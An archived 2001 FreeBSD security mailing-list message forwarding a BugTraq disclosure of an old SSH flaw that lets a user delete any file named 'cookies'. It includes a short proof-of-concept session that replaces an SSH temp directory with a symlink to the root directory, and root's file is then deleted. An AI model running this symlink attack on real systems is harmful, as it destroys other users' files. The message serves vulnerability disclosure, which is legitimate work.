From owner-freebsd-security  Wed Jun  6  2:47:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107])
	by hub.freebsd.org (Postfix) with ESMTP id 650A537B407
	for <security@freebsd.org>; Wed,  6 Jun 2001 02:47:06 -0700 (PDT)
	(envelope-from netch@lucky.net)
Received: from netch@localhost (netch@localhost)
	by burka.carrier.kiev.ua  id MSC30966
	for security@freebsd.org; Wed, 6 Jun 2001 12:47:02 +0300 (EEST)
	(envelope-from netch)
Date: Wed, 6 Jun 2001 12:47:02 +0300
From: Valentin Nechayev <netch@lucky.net>
To: security@freebsd.org
Subject: [fwd] SSH allows deletion of other users files...
Message-ID: <20010606124702.A30808@lucky.net>
Reply-To: netch@lucky.net
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="7JfCtLOvnd9MIVvH"
Content-Disposition: inline
X-42: On
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--7JfCtLOvnd9MIVvH
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Is it applicable to FreeBSD?
(BugTraq contains report that it is)


/netch

--7JfCtLOvnd9MIVvH
Content-Type: message/rfc822
Content-Disposition: inline

Return-Path: <bugtraq-return-246-netch=lucky.net@securityfocus.com>
Received: from outgoing3.securityfocus.com [66.38.151.27]
	by burka.carrier.kiev.ua  with ESMTP id SHL33333
	for <netch@lucky.net>; Mon, 4 Jun 2001 18:19:18 +0300 (EEST)
	(envelope-from bugtraq-return-246-netch=lucky.net@securityfocus.com)
Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])
	by outgoing.securityfocus.com (Postfix) with SMTP id 42FFBA54B0
	for <netch@lucky.net>; Mon,  4 Jun 2001 09:19:10 -0600 (MDT)
Received: (qmail 17878 invoked by alias); 4 Jun 2001 14:55:02 -0000
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10486 invoked from network); 4 Jun 2001 10:12:01 -0000
Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
From: <zen-parse@gmx.net>
X-X-Sender:  <zen-parse@clarity.local>
To: <bugtraq@securityfocus.com>
Subject: SSH allows deletion of other users files...
Message-ID: <Pine.LNX.4.33.0106042203210.13293-100000@clarity.local>
Mime-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=koi8-u

SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want...

as long as its called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse

--7JfCtLOvnd9MIVvH--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message